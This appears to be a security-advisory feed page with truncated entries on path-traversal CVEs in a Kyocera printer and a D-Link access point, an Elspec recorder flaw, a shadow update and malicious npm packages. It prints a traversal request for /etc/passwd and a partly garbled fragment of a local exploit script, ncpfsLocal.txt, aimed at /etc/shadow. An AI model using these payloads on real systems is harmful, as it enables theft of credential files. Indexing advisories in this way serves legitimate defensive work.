CVE-2022-50932

Kyocera Command Center RX ECOSYS M2035dn contains a directory traversal vulnerability that allows unauthenticated attackers to read sensitive system files by manipulating file paths under the /js/ path. Attackers can exploit the issue by sending requests like /js/../../../../.../etc/passwd%00.jpg...

Elspec G5 digital fault recorder security vulnerability

Elspec G5 digital fault recorder is a digital fault recorder from Elspec, Israel, used to monitor and record fault events and waveform data in power systems. A security vulnerability exists in Elspec G5 digital fault recorder version 1.1.4.15 and prior versions, which originates from allowing an...

VulnCheck KEV: CVE-2021-46381

Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading /etc/passwd and /etc/shadow...

OESA-2023-1852 shadow security update

Tools for managing accounts and shadow password files. Security Fixes: shadow: TOCTOU time-of-check time-of-use race condition when copying and removing directory treesCVE-2013-4235...

Malicious Code Bombs Target Amazon, Lyft, Slack, Zillow

Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow among others inside the npm public code repository — all of which exfiltrate sensitive information. The packages weaponize a proof-of-concept PoC code dependency-confusion exploit that w...

ncpfsLocal.txt

!/bin/sh echo 'head1 by super' echo -e '==============\n' function head1 local -r MNTDIR=/mnt.$$ mv /.nwclient /.nwclient.temp ln -sf $1 /.nwclient mkdir $MNTDIR2/dev/null echo $1 ncpmount $MNTDIR echo rmdir $MNTDIR rm /.nwclient mv .nwclient.temp .nwclient2/dev/null for i in /etc/shadow do head1...